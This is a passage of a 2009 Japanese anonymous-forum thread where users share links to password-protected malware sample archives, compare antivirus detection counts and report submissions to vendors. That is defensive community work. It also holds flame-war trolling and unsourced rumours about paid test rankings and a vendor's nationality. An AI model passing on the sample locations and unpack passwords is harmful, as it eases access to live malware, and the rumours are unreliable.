682:名無しさん@お腹いっぱい。
09/09/23 14:46:54
>>680-681
お前がどっか行け
683:名無しさん@お腹いっぱい。
09/09/23 14:53:23
>>679
>>678 はクラウド有りでのテスト結果だよ
684:名無しさん@お腹いっぱい。
09/09/23 15:09:42
>>682-683
>>680-681
685:名無しさん@お腹いっぱい。
09/09/23 15:18:27
どんなに頑張ってもトレンドマイクロは水準以下だから
>>678のテストはバスター厨には関係ないよな
686:名無しさん@お腹いっぱい。
09/09/23 15:20:04
濃度32厨、一つのスレでもコピペしまくりだね。カワイソ(´・ω・) ス
スレリンク(sec板:446番)
スレリンク(sec板:410番)
スレリンク(sec板:395番)
スレリンク(sec板:394番)
スレリンク(sec板:307番)
スレリンク(sec板:293番)
スレリンク(sec板:291番)
スレリンク(sec板:260番)
スレリンク(sec板:228番)
スレリンク(sec板:224番)
スレリンク(sec板:184番)
687:名無しさん@お腹いっぱい。
09/09/23 15:25:00
>>684-686
>>1->>3
>特定のウイルス対策ソフトを擁護、非難する書き込みはやめましょう
>・スレ違いでもめる(2スレ目以降)
>・あらしはスルー。ソフトの優劣の議論は別スレで!!(下記スレなど)
>一番いいセキュリティソフトはなんだ!!Part66
>スレリンク(sec板)
ということで場違いはお前だ、わかったならさっさと消えろ
688:665
09/09/23 15:33:44
>>664
Kasperskyから
Hello,
ad_top.swf - Exploit.JS.DirektShow.al,
google_service.js_ - Trojan-Downloader.JS.Iframe.btr
New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.
gAd_160x600.htm_
No malicious code was found in this file.
689:名無しさん@お腹いっぱい。
09/09/23 15:47:03
>>687=>>678
荒らしのクセにスルー耐性がないので、
NOD32厨だとすぐ分かりますね。^^;
690:名無しさん@お腹いっぱい。
09/09/23 15:48:48
>>689もスルー耐性なく粘着してるわけだが
691:名無しさん@お腹いっぱい。
09/09/23 15:50:52
>>689=>>690
自演荒らし乙
692:名無しさん@お腹いっぱい。
09/09/23 15:55:04
>>690=>>691=>>698>>678=Z音
693:名無しさん@お腹いっぱい。
09/09/23 15:55:08
>>689-692
自演荒らし乙
694:名無しさん@お腹いっぱい。
09/09/23 15:57:07
>>689-693
自演荒らしニート乙
695:名無しさん@お腹いっぱい。
09/09/23 15:57:47
>>689-695
自演荒らし乙
696:名無しさん@お腹いっぱい。
09/09/23 15:59:52
>>689-696
自演荒らしニート乙
697:名無しさん@お腹いっぱい。
09/09/23 15:59:55
>>689-696
自演荒らしニート乙
698:名無しさん@お腹いっぱい。
09/09/23 16:00:18
>>689-698
自演荒らしニート乙
699:fusianasan
09/09/23 16:00:57
(´?????)
700:名無しさん@お腹いっぱい。
09/09/23 16:01:24
>>689-700
自演荒らしニート乙
701:名無しさん@お腹いっぱい。
09/09/23 16:02:02
>>689
バカスいい加減にしろよ
自演荒らしニートの分をわきまえなさいな
702:名無しさん@お腹いっぱい。
09/09/23 16:04:15
日本語でおk。
703:名無しさん@お腹いっぱい。
09/09/23 16:04:27
>>687=>>701
荒らしの癖にスルー耐性のないNOD32厨乙
704:名無しさん@お腹いっぱい。
09/09/23 16:04:52
あ~あ、このスレも末期だな
705:名無しさん@お腹いっぱい。
09/09/23 17:30:30
AV-Comparativesの評価については海外の専門家からも批判が強い
検出率の高さに比べてほとんど評価価値がないといわれる誤検知数を過大に評価しすぎる
との意見が大勢を占めている
日常生活レベルでは絶対にありえない数のマルウェアサンプルを一度にテストにかけ
しかもその数に比べて無視できるほどわずかな誤検出数でもランキングを大幅に下げさせる手法は
一部の検知率があまり高くない反面、誤検出の少ないベンダーのランキングを恣意的に上げる目的
に使われているといわれている(具体的なベンダー名は避けるけど)
もう誤検出数は検査項目から外すべきだと多くの専門家から主張されているにもかかわらず
AV-Comparativesなどの一部格付け調査機関はいまだにそのやり方を変えていない
やはり裏でランキングをめぐりお金が動いているのだろうか?
706:名無しさん@お腹いっぱい。
09/09/23 17:39:51
>>705
ソースは?
WildersSecurityForumを監視する限りでは
専門家からそういう意見は出てないよ
中国企業のトレンドマイクロなら
そういうデマを流して他者を落としいれようと
するだろうけどね
トレンドマイクロは中国企業
ウィルスバスターの開発・張明正
URLリンク(japan.discovery.com)
「台湾人物誌Ⅱ」 新聞局がディスカバリーと共同制作
URLリンク(www.taiwanembassy.org)
「台湾10大国際ブランド」評価、トレンドマイクロが4年連続トップ
URLリンク(www.taiwanembassy.org)
707:名無しさん@お腹いっぱい。
09/09/23 17:44:43
ランキングをカネで買えるんなら
KingsoftがAdvanced+になるだろアホw
708:名無しさん@お腹いっぱい。
09/09/23 18:01:46
ここまでNOD厨の自演
709:名無しさん@お腹いっぱい。
09/09/23 18:07:49
>>664
Avira結果
ad_top.swf CLEAN
gAd_160x600.htm CLEAN
google_service.js CLEAN
カスペ、F-Secureは黒みたいだけどオールクリーン
>>688をみるとぱっと見swfファイルではあったけども
Exploit.JS.DirektShowなのか・・・
710:名無しさん@お腹いっぱい。
09/09/23 21:12:58
>>664
NIS2009を試したところ、スルー。
提出は>>665で行われているので、していません。
711:八頭 ◆YAGApwSaEw
09/09/24 03:55:26
>>710
替わりにSymantecへ提出しておきました
712:名無しさん@お腹いっぱい。
09/09/24 07:42:06
>>711
既に報告が出てるベンダーに敢えて重複提出するなよ。有害だからお前は出てくるな。
713:名無しさん@お腹いっぱい。
09/09/24 08:48:32
URLリンク(tane.sakuratan.com)
infected
■ 検体入手元
MDL 2009/09/15-18+リネージュ資料室の更新リスト9/20分まで+spamメール添付ファイル
■ 検体提出先
Avira:FTP経由で提出完了
AntiyLabs:FTP経由で提出完了
その他:未提出
■ 注意事項
例によって、設定ファイルも含めているので、白判定のファイル多いと思います。
提出される方はその辺をご承知おきください。
最近は検体拾う時間もなかなかとれませんな。連休だったというのに。orz
714:Norton&Panda使用者
09/09/24 08:57:34
>>713
・・・・今回は各ベンダーに提出はパス(提出用ファイルを作るのが大変すぎる、特にSymantecとTrendMicro)
他力本願で申し訳ないけど代わりに提出お願いします、SymantecとPandaとBitDefenderとavast!とTrendMicroに提出してくれたら助かります
715:八頭 ◆YAGApwSaEw
09/09/24 09:33:04
>>713さん乙
ここまでSymantecとa-squaredとMalwarebytesに提出しました
>>714さん
上記3社は今後、慣れてる僕が受け持ちます
716:名無しさん@お腹いっぱい。
09/09/24 09:54:59
TrendMicroへ提出しましたが・・・mpg_1.scrだけ遅れませーん
後で再チャレンジ予定
717:名無しさん@お腹いっぱい。
09/09/24 10:36:01
>>713さん、乙です
やっぱりmpg_1.scrだけ送れません(汗
やり方がおかしいのかな~
スルーします。申し訳ありません。
718:名無しさん@お腹いっぱい。
09/09/24 11:54:36
>>715
代理提出乙です
>>713
検出数だけ
NortonInternetSecurit2009
66/93
ESETSmartSecurity4.0(この後ESETを削除してウイルスバスター2010をインストールしたためうろ覚えになるので申し訳ない)
57/93
PandaGlobalProtection2010
66/93
ウイルスバスター2010
66/93
719:714
09/09/24 12:16:21
>>713
ESETとKasperskyに提出しました
>>715
代理提出本当にありがとうございます、おかげで提出作業がかなり楽になりました
720:名無しさん@お腹いっぱい。
09/09/24 12:35:45
>>713
BitDefenderTotalSecurity2010
64/93
BitDefenderは2008と2010では検出率が違うのかこのスレの検体を使って検証してみようと思う
ちなみにウイルスバスターは違いました、当然のことながら2010の方が2008より検出率が良かった(ただし2008も最新検索エンジン当てれば恐らく2010と検出率は同じになると思う)
ウイルスバスターで一番驚いたのが2010と2007の検出率の差、2007では2010で検出した検体の3割も検出できてなかった
721:名無しさん@お腹いっぱい。
09/09/24 12:39:55
あ・・・すごい大きな表記ミス
64/93の左側の数字は検出数ではなく未検出数でしたorz
当然のことながら>>718で報告した数字の左側は未検出数ですorz
検出数はNortonとPandaとウイルスバスターは27、ESETは36、BitDefenderは29です
連投も兼ねて迷惑かけて申し訳ありませんでしたorz
722:名無しさん@お腹いっぱい。
09/09/24 13:35:44
URLリンク(tane.sakuratan.com)
virus
723:716
09/09/24 14:01:24
>>722さん乙です
tane0518
ウィルスバスター2010 1/7
未検出分を提出しました
724:名無しさん@お腹いっぱい。
09/09/24 14:53:38
>>722
Symantec、Panda、GDATA2010(avast!&BitDefender)、ESET、Kaspersky、AVG、Avira、Ahnlabへ提出
>>723
提出乙です
Aviraから
25458478 pcclient1.exe 61.96 KB MALWARE
25458479 redstone1.exe 49.5 KB MALWARE
25458480 upk1.exe 23.74 KB MALWARE
25458481 x1.exe 42.5 KB UNDER ANALYSIS
25458482 x1_1.exe 33.16 KB MALWARE
25458483 x150.exe 42.5 KB UNDER ANALYSIS
25458484 x150_1.exe 33.16 KB MALWARE
725:名無しさん@お腹いっぱい。
09/09/24 14:54:07
>>722
Symantecから
filename: redstone1.exe
machine: Machine
result: See the developer notes
filename: x1.exe
machine: Machine
result: See the developer notes
filename: x150_1.exe
machine: Machine
result: See the developer notes
filename: pcclient1.exe
machine: Machine
result: See the developer notes
filename: x150.exe
machine: Machine
result: See the developer notes
filename: x1_1.exe
machine: Machine
result: See the developer notes
726:名無しさん@お腹いっぱい。
09/09/24 14:54:59
>>713の検体をESETとKasperskyに送ったつもりですが・・・
どうやらそのまま送ったのがいけなかったのか、サイズオーバーでエラーが返ってきましたorz
727:名無しさん@お腹いっぱい。
09/09/24 19:14:21
Rising Internet Security 2010 22.14.03.06 (22.00.01.02)
>>722
pcclient1.exe: Trojan.Win32.Generic.11EDA5AE
redstone1.exe: Trojan.Win32.Generic.11EDA5AD
upk1.exe: Trojan.Win32.Generic.11EDA2D3
x1.exe: Trojan.Win32.Edog.cc
x150.exe: Trojan.Win32.Edog.cc
x150_1.exe: Trojan.Win32.Edog.cd
x1_1.exe: Trojan.Win32.Edog.cd
7/7
728:720@Norton&Panda使用者
09/09/24 19:30:47
とりあえず結果報告(スレチなのでなるべく簡潔にします)
BitDefender2010とそれ以前のバージョンの検出率の比較ですがやはり差はありました(当然のことながら2010が一番良い)
比較したバージョンは2010と2008とv10(v10はフリー版)、で、結果は2010>>v10>>>>>2008
2008の結果が酷すぎるように見えるんですが動作が上手くいってなかったかもしれないので参考にするのは2010>>v10でいいと思う
検出率が良くなってる要因は恐らくヒューリスティックの強化かも?(Generic系の検出がかなり多かったから)
PandaやNorton、Kasperskyと比べるとどのように検出率が上がったかその説明がないのがわかりにくいですね
以上、結果報告でした、あ、あまり簡潔にならなかったかも・・・
729:名無しさん@お腹いっぱい。
09/09/24 19:42:39
>>713
McAfee (Active Protection 無効)31/93
未検出分をMcAfeeに提出させて頂きました。
AVERT自動返信
URLリンク(tane.sakuratan.com)
730:名無しさん@お腹いっぱい。
09/09/24 19:43:45
>>722
McAfee (Active Protection 無効)3/7
未検出分をMcAfeeに提出させて頂きました。
AVERT自動返信
File Name Findings Detection Type Extra
--------------------|------------------------------|----------------------------|------------|-----
redstone1.exe |new detection |pws-mmorpg!gj |Trojan |yes
upk1.exe |heuristic detection |new malware.n |Trojan |no
x1.exe |inconclusive | | |no
x150.exe |inconclusive | | |no
731:名無しさん@お腹いっぱい。
09/09/24 21:44:54
>>722さん乙
ここまでSymantecとa-squaredとMalwarebytesに提出しました
732:名無しさん@お腹いっぱい。
09/09/26 03:24:20
(参考)カスペ2010 0:20
>>713㌧ (>>719,726代理提出㌧) 48/93
(1) .Braviax 2/2
Trojan-Dropper.Win32.FrauDrop.uf \Install(2).exe
Trojan-Dropper.Win32.FrauDrop.ug \Install.exe
(2). Exploit 6/9
①reycross 1/1
Trojan-Downloader.JS.ActiveX.cm \lib.htm
②statscount 2/3
Exploit.Win32.Pidief.bgy \8.pdf
Backdoor.Win32.Bredolab.zq \load.php
③giando .1/1
Exploit.Win32.Pidief.atj \Lettera_Urgentissima.pdf
④92.60.176.33 2/3
virus HEUR:Exploit.Script.Generic \main.htm
⑤ ame.com 0/1
(3). Obfuscated 1/1
Trojan.BAT.Agent.tf \8732489273.php
(4) Rogue 8/14 (残6htm)
not-a-virus:FraudTool.Win32.AntivirusPlus.my \AntivirusPlus.exe
Trojan.Win32.FraudPack.uai \Install.exe
Trojan.Win32.FraudPack.uep \Soft_71.exe
:FraudTool.Win32.AntivirusPlus.no \avplus.exe
Trojan-Downloader.Win32.FraudLoad.fpx \setup(1).exe、 \setup.exe (2files)
Trojan.Win32.FraudPack.uen \Rogue\u4.exe
(5) Scam 0/15 (残htm, php)
(6) spam_mail 5/5
Packed.Win32.Krap.w \DHL_INVOICE*.exe (3files)
Trojan.Win32.Pincav.f \playatataq1a12.exe
733:名無しさん@お腹いっぱい。
09/09/26 03:26:09
>>732の続き
Trojan-Downloader.Win32.Murlo.cba l\nz.exe
(7) Renos 1/1
Trojan-Downloader.Win32.Small.adrl \baka444.ext
(8) TDSS 10/10 (zipも検出)
Packed.Win32.Krap.x \pc1.exe/zip
Packed.Win32.TDSS.z \dm3.exe/zip
Net-Worm.Win32.Koobface.bqn \cw2.exe/zip
Trojan.Win32.Sasfis.iji \t3.exe/zip
Trojan.Win32.FraudPack.tyj \sisa.exe/zip
(9) Tedroo 1/2
Trojan.Win32.Buzus.casu \update.exe
(10) Dropper 7/7
Trojan-Dropper.Win32.Agent.aytz 全ファイル(7つ)
(11) zeus 7/26
Trojan program Trojan-Spy.Win32.Zbot.gen \1(1).exe 、 \1.exe、 \file.exe (3files)
Trojan-Spy.Win32.Zbot.aaul \bot.exe
Trojan-Spy.Win32.Zbot.abfh \cssexe.exe
Trojan-Spy.Win32.Zbot.abaa \exe.exe
Trojan-Spy.Win32.Zbot.abel \kav.exe
(12) Win32Perkesh 0/1
>>722 tane0518 (>>724㌧)
7/7
Trojan-Dropper.Win32.Agent.aytz \pcclient1.exe
Trojan.Win32.Inject.ajfq \redstone1.exe
Trojan-Downloader.Win32.Geral.dhp \upk1.exe
Trojan-Dropper.Win32.Agent.bdtb \x1.exe、 \x150.exe
Trojan-Downloader.Win32.Murlo.cda \x150_1.exe、 \x1_1.exe
734:名無しさん@お腹いっぱい。
09/09/26 20:05:25
URLリンク(tane.sakuratan.com)
virus
735:名無しさん@お腹いっぱい。
09/09/26 20:23:27
Rising Internet Security 2010 22.14.05.07 (22.00.01.03)
>>734
1-2,4-5,7-8,16,21,32.exe: Trojan.PSW.Win32.GameOnline.egd
3,6,10,25.exe: Trojan.PSW.Win32.GameOnline.dvt
11,13-15,19,22,27,29,31,33.exe: Dropper.Win32.ExInject.f
9,17.exe: Trojan.PSW.Win32.OnlineGame.yww
18.exe>>DLLFILE: Trojan.PSW.Win32.GameOL.ojr
20.exe: Trojan.PSW.Win32.GameOnline.een
23-24.exe: Trojan.PSW.Win32.GameOnline.eey
26,30.exe: Trojan.PSW.Win32.OnlineGame.zao
34.exe: Trojan.DL.Win32.Nodef.zb
35.exe: Trojan.PSW.Win32.QQPass.esj
36.exe>>9f: Trojan.Win32.Generic.11ED9077
36.exe>>68: Trojan.Win32.Generic.11EDB1AD
36.exe>>68: Trojan.Win32.Nodef.xjl
36.exe>>65: Trojan.DL.Win32.Nodef.aiu
37.exe>>upack0.39: Backdoor.Win32.Mnless.ctc
fsg12.exe: Trojan.Win32.Generic.11EDA405
fsg28.exe>>fsg2.0: Trojan.PSW.Win32.GameOnline.fay
upack1.exe: Trojan.Win32.Generic.11EDAF72
x1,x150.exe: Trojan.Win32.Generic.11EDB37A
x150_1.exe: Trojan.Win32.Generic.11EDB37B
x1_1.exe: Trojan.Win32.Generic.11EDB37C
42/42
736:名無しさん@お腹いっぱい。
09/09/26 20:24:46
>>734さん乙
Symantecとa-squaredとMalwarebytesに提出しました
737:名無しさん@お腹いっぱい。
09/09/26 20:26:13
>>734さん乙です
ウィルスバスター2010
34/42
未検出分を提出させて頂きました
738:名無しさん@お腹いっぱい。
09/09/26 21:05:44
>>734
McAfee (Active Protection 無効)40/43←スキャンログでは43ですが目視では42
未検出分をMcAfeeに提出させて頂きました。
AVERT自動返信
File Name Findings Detection Type Extra
--------------------|------------------------------|----------------------------|------------|-----
35.exe |inconclusive | | |no
x1.exe |inconclusive | | |no
x150.exe |inconclusive | | |no
739:名無しさん@お腹いっぱい。
09/09/26 21:13:05
カスペ2010 18:39
>>734 ㌧ tane0521
36/42
検体提出します。
Trojan-GameThief.Win32.OnLineGames.bmtc \1.exe
Trojan-GameThief.Win32.Magania.bxxp \10.exe
Trojan-GameThief.Win32.Magania.biht \11.exe、 [13-15].exe、 \19.exe、 \22.exe、 \31.exe (7)
Trojan-Dropper.Win32.Agent.ayqa \16.exe、 \2.exe、 \21.exe (3)
Trojan-GameThief.Win32.Magania.bwyr \17.exe
Trojan-GameThief.Win32.OnLineGames.thoc \18.exe
Trojan-GameThief.Win32.Magania.bwsr \20.exe、 \[23-25].exe、 \30.exe (5)
Trojan-GameThief.Win32.Magania.bkii \26.exe
Trojan-GameThief.Win32.Magania.bwxz \27.exe、 \29.exe (2)
Trojan-GameThief.Win32.Magania.bwsr \3.exe
Trojan-Dropper.Win32.Agent.ayqa \32.exe
Trojan-GameThief.Win32.Magania.biht \33.exe 、
Trojan-Downloader.Win32.Small.kdk \34.exe
Trojan-Dropper.Win32.Agent.bdlr \36.exe
Trojan-Dropper.Win32.Agent.bcvr \37.exe
Trojan-Dropper.Win32.Agent.ayqa \4.exe、 \5.exe、 \7.exe、 \8.exe (4)
Trojan-GameThief.Win32.Magania.bwsr \6.exe
Trojan-GameThief.Win32.Magania.bwyr \9.exe
Trojan.Win32.Slefdel.efm \fsg12.exe
Trojan.Win32.Slefdel.efo \fsg28.exe
740:732
09/09/26 21:19:45
カスペからの返事
>>713(>>732,733) tane0517
48+1=49/93
Rogue \ mycomputer-scannervv.com.htm - Trojan.JS.Fraud.g
Rogue \ Alpha-Scan-420d928_2004.exe - Trojan-Downloader.Win32.FraudLoad.fqg (←KSN検知から変更)
Exploit\...\AMEMain.pdf - 白
※白っぽいのは提出見送っているので、参考。
741:名無しさん@お腹いっぱい。
09/09/26 21:40:53
>>734
Panda、GDATA2010(avast!&BitDefender)、ESET、AVG、Avira、Ahnlabへ提出
>>736
>>737
代理提出乙です
あとBitDefenderとは別にF-Secureにも提出した方がいいかな?
今までKaspersky or BitDefenderで対応してくれると思ったから必要ないかなと思ったけど
742:名無しさん@お腹いっぱい。
09/09/26 23:21:20
>>734 (>>739) tane0521
カスペからの返事
36+6=42/42でクローズ
35.exe - Trojan.Win32.Agent.cxjj
upack1.exe - Worm.Win32.AutoRun.axbu
検知 22:11
Trojan-Downloader.Win32.Murlo.ceo \x150_1.exe
Trojan-Downloader.Win32.Murlo.ceo \x1_1.exe
Trojan-Dropper.Win32.Agent.bedo \x1.exe
Trojan-Dropper.Win32.Agent.bedo \x150.exe
743:名無しさん@お腹いっぱい。
09/09/26 23:56:42
URLリンク(www.gameicity.com)
744:名無しさん@お腹いっぱい。
09/09/27 01:20:03
>>743
URLリンク(tane.sakuratan.com)
infected
URLリンク(www.virustotal.com)
745:名無しさん@お腹いっぱい。
09/09/27 05:46:11
>>743さん乙
Symantecとa-squaredとMalwarebytesに提出しました
746:名無しさん@お腹いっぱい。
09/09/27 06:34:41
>>743>>744さん乙です
VirustotalのTrendMicroはPAK_Generic.001で検出してますが
自分のウィルスバスター2010はスルーしてるので一応提出させて頂きました
747:名無しさん@お腹いっぱい。
09/09/27 18:22:35
>>743,744㌧ tane0522
カスペ2010 16:01
1/1
Trojan.Win32.Inject.ajjx MS-JP.exe
VTからみると、事後提出、事後検知かな。
748:名無しさん@お腹いっぱい。
09/09/28 11:01:13
ms-jp.exeは自己解凍rarで、中身はmxd.exeとmxd1.exeの2ファイル。
で、この2ファイルは同一バイナリ(意図不明。操作ミスかと)。
URLリンク(tane.sakuratan.com)
VT等は結果がそれぞれ1行目しか出ないので
複数ファイルを圧縮した物を投げると結果が信用できなくなります。
URLリンク(www.virustotal.com)
749:名無しさん@お腹いっぱい。
09/09/28 11:02:04
パス忘れてた。
virus
750:名無しさん@お腹いっぱい。
09/09/28 11:32:52
>>748さん乙
TrendMicroへ提出させて頂きました
751:名無しさん@お腹いっぱい。
09/09/28 13:26:09
>>748
Symantec、GDATA2010(avast!&BitDefender)、Ahnlabへ提出
Symantecから
filename: mxd.exe
machine: Machine
result: See the developer notes
752:名無しさん@お腹いっぱい。
09/09/28 16:56:46
>>748さん乙
Symantecとa-squaredとMalwarebytesに提出しました
753:名無しさん@お腹いっぱい。
09/09/28 17:31:50
>>748
McAfee (Active Protection 無効)0/1
McAfeeに提出させて頂きました。
AVERT自動返信
File Name Findings Detection Type Extra
--------------------|------------------------------|----------------------------|------------|-----
mxd.exe |inconclusive | | |no
754:名無しさん@お腹いっぱい。
09/09/29 18:39:51
【軽い】MS、無料ウイルス対策ソフト「Security Essentials」29日公開
スレリンク(news板)
755:名無しさん@お腹いっぱい。
09/09/29 18:49:22
>>754
スレチだしウザイ
それに>>678の結果からMSSEは
既存のAVIRA、Avast、AVGには未だ及ばないよ
もう一息だと思うけどね
756:名無しさん@お腹いっぱい。
09/09/29 21:13:58
凋落中のAVGは即死だろw
757:名無しさん@お腹いっぱい。
09/09/29 23:13:51
>>1
>特定のウイルス対策ソフトを擁護、非難する書き込みはやめましょう
スレチに触るな
758:名無しさん@お腹いっぱい。
09/09/30 14:08:32
>>748
McAfeeよりDAT5766で対応との返答。
mxd.exe detected pws-mmorpg.gen trojan
759:名無しさん@お腹いっぱい。
09/10/01 12:27:50
カスぺ、ついにZEROに検出率ぬかれたぁあああああああああああああああああ
URLリンク(antivirus-news.net)
760:名無しさん@お腹いっぱい。
09/10/07 01:54:59
2009/10/07 1:51:11 禁止しました: HEUR:Trojan-Downloader.Script.Generic Opera Internet Browser URLリンク(mixi.jp)
761:名無しさん@お腹いっぱい。
09/10/07 04:05:47
検体を持ってきてね
762:名無しさん@お腹いっぱい。
09/10/07 11:44:49
URLリンク(www.virustotal.com)
763:名無しさん@お腹いっぱい。
09/10/07 13:13:42
>>762
検体はどこ?
764:名無しさん@お腹いっぱい。
09/10/07 16:47:52
フリーソフトを入れるとPC壊れるって書いてるやつがwww
こんなこと本気で思ってんのかこいつwww
URLリンク(oshiete.filesend.to)
765:762
09/10/07 20:48:03
URLリンク(tane.sakuratan.com)
D/解 virus
766:名無しさん@お腹いっぱい。
09/10/07 21:05:01
>>754-759,764
スレ違い
基地外がわいてきたな。
767:fusianasan
09/10/07 21:41:18
>>766
スレ違い
基地外がわいてきたな。
768:名無しさん@お腹いっぱい。
09/10/07 21:44:04
ZERO最強だからこんな糞スレイラネ
ついでにノートンとバスターは糞の中の糞
769:名無しさん@お腹いっぱい。
09/10/07 23:30:08
>>765
乙
Symantec NortonInternetSecurity2009
AutoProtectによってTrojanHorseを検出
(定義バージョン2009.10.06.038)
770:769
09/10/07 23:42:15
連投スマソ
23:30現在のVirusTotal (25/41)
URLリンク(www.virustotal.com)
約5日で、対応したベンダが10社。
G DATA、avast!が取りこぼしているのが珍しい・・・かな?
771:名無しさん@お腹いっぱい。
09/10/07 23:50:48
>>765
Risingスルー
提出完了
RS20091007224454765023
772:名無しさん@お腹いっぱい。
09/10/09 08:11:56
>>765さん乙です
ウィルスバスター2010スルー
TrendMicroへ提出させて頂きました
773:名無しさん@お腹いっぱい。
09/10/09 18:41:41
URLリンク(tane.sakuratan.com)
virus
nicovedeoというアレなドメインで投下されたネトゲトロイ。
774:名無しさん@お腹いっぱい。
09/10/09 19:07:51
>>773さん乙
URLリンク(www.virustotal.com)
SymantecとMalwarebytesに提出しました
775:771
09/10/09 19:56:40
Rising Internet Security 2010 22.16.04.07 (22.00.01.07)
>>773
trojan1.exe: Trojan.Win32.Generic.11EDEE6D
>>765
病毒名称:Trojan.Win32.Generic.11EDFE8C
解決版本:22.16.03.00
776:名無しさん@お腹いっぱい。
09/10/09 20:03:46
ライジングのこれには何度も腰を抜かされた
777:名無しさん@お腹いっぱい。
09/10/10 15:46:33
URLリンク(tane.sakuratan.com)
virus
778:名無しさん@お腹いっぱい。
09/10/10 15:56:27
Rising Internet Security 2010 22.16.05.03 (22.00.01.08)
>>777
x1.exe: Trojan.DL.Win32.Mnless.fhs
x1_2.exe: Trojan.DL.Win32.Mnless.fho
x200.exe: Trojan.DL.Win32.Mnless.fhs
x200_2.exe: Trojan.DL.Win32.Mnless.fho
4/6
検体提出完了
RS20091010145020812618
779:名無しさん@お腹いっぱい。
09/10/10 16:10:58
>>777さん乙です
ウィルスバスター2010
Mal_DRPR-3 tane0528\x200.exe
Mal_DRPR-3 tane0528\x1.exe
2/6
未検出分を提出させて頂きました
780:名無しさん@お腹いっぱい。
09/10/10 16:29:11
>>779
ウイルスバスター2010使いに質問ですが、検体収集機能はどんな感じに動作してます?
781:名無しさん@お腹いっぱい。
09/10/10 16:35:26
>>777
Symantec、Panda、GDATA2010(avast!&BitDefender)、ESET、Avira、AVG、Kaspersky、Ahnlabへ提出
782:名無しさん@お腹いっぱい。
09/10/10 16:38:59
>>777
F-Secureにも提出しておきました
Symantecから
filename: x1.exe
machine: Machine
result: See the developer notes
filename: x200_2.exe
machine: Machine
result: See the developer notes
filename: x1_1.exe
machine: Machine
result: See the developer notes
filename: x200_1.exe
machine: Machine
result: See the developer notes
filename: x1_2.exe
machine: Machine
result: See the developer notes
filename: x200.exe
machine: Machine
result: See the developer notes
783:名無しさん@お腹いっぱい。
09/10/10 16:59:52
>>777
McAfee (Active Protection 無効)4/6
未検出分をMcAfeeに提出させて頂きました。
AVERT自動返信
File Name Findings Detection Type Extra
--------------------|------------------------------|----------------------------|------------|-----
x1.exe |inconclusive | | |no
x200.exe |inconclusive | | |no
784:名無しさん@お腹いっぱい。
09/10/10 17:03:16
>>780
スマートプロテクションネットワークってやつです?
自分は仮想環境でzipファイルを解凍してるだけなんで分かりません^^;
TrendプロテクトでWEBサイトの評価をしてくれてるみたいなんで
危険なサイトへ行けば動き(バスターやルーターにログ)があるかも?ですね
こんなんでスイマセン
785:名無しさん@お腹いっぱい。
09/10/10 17:10:06
>>784
ありがとうございます
私もウイルスバスター2010は持ってるんですがこの機能はどのように動作してるのかイマイチわからないんですよね
NortonやESET、avast!とかはNortonインサイトやESETのイベントログ、検出時のチェック項目とかでどのように検体を送信してるかというのがわかりやすいんですけどね
ただ振る舞い検知機能と検体収集機能は今後すごく重要な機能になると思いますね
786:778
09/10/10 17:12:18
Rising Internet Security 2010 22.16.05.05 (22.00.01.08)
>>777
x1_1.exe: Trojan.Win32.Generic.11EE2158
x200_1.exe: Trojan.Win32.Generic.11EE215A
4+2=6/6
787:名無しさん@お腹いっぱい。
09/10/10 18:32:13
>>777さん乙
ここまでSymantecとa-squaredとMalwarebytesに提出しました
788:781 782
09/10/10 23:31:18
>>777
Kasperskyから
Hello,
x1.exe, x200.exe - Trojan-Downloader.Win32.Servill.ol
New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.
x1_1.exe, x200_1.exe - Trojan-Downloader.Win32.Servill.ok
x1_2.exe, x200_2.exe - Trojan-Downloader.Win32.Murlo.chz
789:781 781
09/10/11 16:46:24
>>777
現在の状況
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
790:781 782
09/10/11 16:54:27
検出報告やVirustotal貼り付けたりしてないので根拠がないのですがこの一日で大方対応してくれたベンダーは
Symantev、TrendMicro、Panda、Kaspersky、Avira、BitDefenderでした(ESETは最初から全検出してたので除外、McAfeeも動きなし)
この中で全検出したのはTrendMicro、Kaspresky、Avira、BitDefender
avast!は明後日辺りに対応するかも(いつも対応してくれるのはこれぐらいだから)
TrendMicroはフィードバック機能、BitDefenderは誤検出大幅減ということで対応速度が良くなりつつある?今後に期待
それにしてもAVG・・・2年前は一日で対応してくれることが多かったのに・・・
791:名無しさん@お腹いっぱい。
09/10/11 16:56:03
失礼、よく見たらavast!も全検出してたorz
792:名無しさん@お腹いっぱい。
09/10/11 17:07:22
してないじゃん
793:名無しさん@お腹いっぱい。
09/10/11 17:57:31
avast!は10日の段階で>>777全部検出してるよ
794:名無しさん@お腹いっぱい。
09/10/11 20:53:03
456KB (467405Byte) 0.125秒
795:名無しさん@お腹いっぱい。
09/10/11 21:40:16
>>765
ウイルスバスター2010
TROJ_AGENT.ARCV crash_service.exe
796:名無しさん@お腹いっぱい。
09/10/12 11:48:05
URLリンク(tane.sakuratan.com)
virus
797:名無しさん@お腹いっぱい。
09/10/12 12:21:07
>>796
File size: 52584 bytes
MD5 : 6aa9505e58e716418da053474f394fd5
SHA1 : 47cf55021d4e938fe9babc24c588060bd91cbcdc
SHA256: 9f5377e1b36ababcd11548363ce50c322c4ace65f76f1858c9ce2a76b584e8f5
今しがたウイルストータルに掛けたところ10月11日に1度スキャン済みで結果が出ていました。
表示されている時間に時差9時間を足すとおよそ日本の時間になります。
以下の結果2つは同一ファイルですが11日と12日の物になります。
ファイル名 6aa9505e58e716418da053474f394fd5 受理 2009.10.11 17:59:57 (UTC)
結果: 11/41 (26.83%)
URLリンク(www.virustotal.com)
ファイル名 redstone1.exe 受理 2009.10.12 03:07:49 (UTC)
結果: 16/41 (39.03%)
URLリンク(www.virustotal.com)
798:名無しさん@お腹いっぱい。
09/10/12 12:33:23
Rising Internet Security 2010 22.17.00.02 (22.00.01.08)
>>796
スルー
提出完了
RS20091012112709265139
799:名無しさん@お腹いっぱい。
09/10/12 13:18:35
>>796さん乙
SymantecとMalwarebytesに提出しました
800:名無しさん@お腹いっぱい。
09/10/12 15:46:33
>>796乙
F-secureに提出済み
801:名無しさん@お腹いっぱい。
09/10/12 19:45:23
>>796
Panda、GDATA2010(BitDefender)、ESET、TrendMicro、Kaspersky、Avira、Ahnlabへ提出
802:801
09/10/12 21:48:25
TrendMicroの件ですがもしかしたら提出失敗で提出できてない可能性があるので誰か代わりにTrendMicroに提出できる人がいたらお願いします
803:798
09/10/13 02:27:45
>>796
